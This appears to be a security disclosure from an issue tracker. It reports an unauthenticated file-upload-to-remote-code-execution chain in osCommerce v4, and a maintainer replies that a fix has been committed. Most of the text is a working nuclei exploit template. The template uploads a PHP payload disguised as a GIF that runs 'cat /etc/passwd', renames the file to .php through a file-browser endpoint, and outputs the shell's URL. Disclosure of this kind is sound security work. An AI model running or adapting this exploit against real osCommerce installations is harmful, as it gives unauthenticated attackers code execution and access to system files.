Unauthenticated Arbitrary File Upload

[blockisec]

Any unauthenticated user can upload image files using the upload connector of the ckeditor (located at /admin/plugins/ckeditor/fm/connectors/php/upload.php). The uploaded image file can be renamed to a PHP extension in a second step which results in unauthenticated RCE. Renaming of the image file happens in the /admin/plugins/ckeditor/plugins/pdw_file_browser/actions.php endpoint.

The following nuclei template can be used to identify and exploit the vulnerability:

id: oscommerce-v4-rce-chain

info:
  name: OSCommerce  v4 RCE chain
  tags: oscommerce,php
  author: blocki
  severity: critical

variables:
  payload: '<?php echo system("cat /etc/passwd");?>'
  filename: "{{rand_text_alpha(5)}}"

http:
  - raw:
    - |
      POST /admin/plugins/ckeditor/fm/connectors/php/upload.php?Type=Image HTTP/1.1
      Host: {{Hostname}}
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySnpOFkmOvbSHJX5G

      ------WebKitFormBoundarySnpOFkmOvbSHJX5G
      Content-Disposition: form-data; name="NewFile";filename="{{filename}}.gif";
      Content-Type: image/png

      GIF8
      {{payload}}
      ------WebKitFormBoundarySnpOFkmOvbSHJX5G--      

    - |
      POST /admin/plugins/ckeditor/plugins/pdw_file_browser/actions.php HTTP/1.1
      Host: {{Hostname}}
      Content-Type: application/x-www-form-urlencoded

      action=rename&new_filename={{filename}}.php&old_filename={{filename}}.gif&folder=/images/      

    matchers:
      - type: dsl
        condition: and
        dsl:
          - status_code_1 == 200 && contains(body_1, "OnUploadCompleted(0") && contains(body_1, "{{filename}}.gif")
          - status_code_2 == 200 && contains(body_2, "Name successfully changed!") && contains(body_2, "success||")

    extractors:
      - type: dsl
        dsl:
          - '"File -> " + BaseURL + "/images/" + filename + ".php"'

[pan-oscom]

Thank you! I've just committed the fix